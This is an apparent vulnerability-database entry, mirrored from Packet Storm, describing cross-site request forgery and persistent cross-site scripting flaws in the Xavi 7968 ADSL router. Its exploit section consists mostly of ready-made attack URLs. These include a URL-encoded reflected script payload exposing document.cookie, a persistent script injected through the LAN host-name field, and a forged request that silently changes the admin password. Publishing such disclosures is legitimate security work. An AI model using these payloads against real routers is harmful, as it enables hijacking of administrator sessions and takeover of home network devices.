Sign-up

ID

VAR-E-201202-0850


TITLE

Xavi 7968 ADSL Router Cross Site Request Forgery / Cross Site Scripting

Trust: 0.5

sources: PACKETSTORM: 109987

DESCRIPTION

The Xavi 7968 router suffers from cross site request forgery and persistent cross site scripting vulnerabilities.

Trust: 0.5

sources: PACKETSTORM: 109987

AFFECTED PRODUCTS

vendor:xavimodel:adsl routerscope:eqversion:7968

Trust: 0.5

sources: PACKETSTORM: 109987

EXPLOIT

Xavi 7968 ADSL Router: Persistent cross site scripting (XSS) / Cross site request forgery (CSRF)
------------------------------------------------------------------------------------------------

Description: Xavi 7968 Router is completely vulnerable to Persistent cross site scripting (XSS) and Cross site request forgery (CSRF). (Admin privileges)

** XSS example: (Alert with Cookie)

http://192.168.1.1/webconfig/wan/confirm.html/confirm?context=pageAction%3Dadd%26pvcName%3D%2522%253e%253c%252ftd%253e%253cscript%253ealert%28document.cookie%29%253c%252fscript%253e%26vpi%3D0%26vci%3D38%26scat%3DUBR%26accessmode%3Dpppoe%26encap%3Dvcmux%26encapmode%3Dbridged%26iptype%3Ddhcp%26nat_enable%3Dfalse%26def_route_enable%3Dfalse%26qos_enable%3Dfalse%26chkPPPOEAC%3Dfalse%26tBoxPPPOEAC%3DNot%2520Configured%26sessiontype%3Dalways_on%26username%3Da%26password%3Dss&confirm=+Apply+

** Persistent XSS example: (Alert with Cookie)

Add code: http://192.168.1.1/webconfig/lan/lan_config.html/local_lan_config?ip_add_txtbox=192.168.1.1&sub_mask_txtbox=255.255.255.0&host_name_txtbox=Hack<SCRIPT>alert(document.cookie)</script>&domain_name_txtbox=local.lan&mtu_txtbox=1500&next=Apply
Exploit URL: http://192.168.1.1/webconfig/upgrade_image/image_upgrade.html

** Cross site request forgery example: (Change admin Password 1234 -> 12345):

http://192.168.1.2/webconfig/admin_passwd/passwd.html/admin_passwd?sysUserName=1234&sysPassword=12345&sysCfmPwd=12345&cmdSubmit=Apply

This is just an example, all forms in the router interface are vulnerable to CSRF and if they accept text input, to XSS.

Author: Busindre busilezas[@]gmail.com

Trust: 0.5

sources: PACKETSTORM: 109987

EXPLOIT HASH

LOCAL

SOURCE

md5: 7171faa7046bce2921b5676cd357923d
sha-1: ba0fea7cee577af7ca784ee9404e505ac371fadc
sha-256: 0c039e2b4d465e7ff02208af6529c8a0ca6aed64f68bf75e27e8e39625367265
md5: 7171faa7046bce2921b5676cd357923d

Trust: 0.5

sources: PACKETSTORM: 109987

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 109987

TYPE

xss, csrf

Trust: 0.5

sources: PACKETSTORM: 109987

TAGS

tag:exploit

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:xss

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 109987

CREDITS

Busindre

Trust: 0.5

sources: PACKETSTORM: 109987

EXTERNAL IDS

db:PACKETSTORMid:109987

Trust: 0.5

sources: PACKETSTORM: 109987

SOURCES

db:PACKETSTORMid:109987

LAST UPDATE DATE

2022-07-27T09:33:05.775000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:109987date:2012-02-21T03:33:43